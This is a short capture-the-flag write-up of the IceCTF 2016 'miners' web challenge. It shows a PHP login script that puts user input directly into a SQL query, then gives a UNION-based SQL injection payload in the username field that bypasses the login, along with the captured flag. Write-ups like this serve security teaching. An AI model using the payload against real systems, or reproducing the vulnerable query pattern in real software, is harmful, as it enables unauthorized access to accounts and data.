Information#
Version#
| By | Version | Comment |
|---|---|---|
| noraj | 1.0 | Creation |
CTF#
- Name : IceCTF 2016
- Website : https://icec.tf/
- Type : Online
- Format : Jeopardy
- CTF Time : link
Description#
The miners website has been working on adding a login portal so that all miners can get the flag, but they haven't made any accounts! However, your boss demands the flag now! Can you get in anyway? miners.vuln.icec.tf
Solution#
- Notice that users database is empty!
- We have the source code:
<?php
include "config.php";
$con = mysqli_connect($MYSQL_HOST, $MYSQL_USER, $MYSQL_PASS, $MYSQL_DB);
$username = $_POST["username"];
$password = $_POST["password"];
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysqli_query($con, $query);
if (mysqli_num_rows($result) !== 1) {
echo "<h1>Login failed.</h1>";
} else {
echo "<h1>Logged in!</h1>";
echo "<p>Your flag is: $FLAG</p>";
}
?>- Even if DB is empty we need the SQL request to generate 1 row:
mysqli_num_rows($result) !== 1. - To do that we will use and
UNIONwith a non-emptySELECTrequest and we'll try to guess number of columns. - Username:
' UNION SELECT 1,2,3 #and Password:random. - Flag:
IceCTF{the_miners_union_is_a_strong_one}.
Note: Database is MySQL.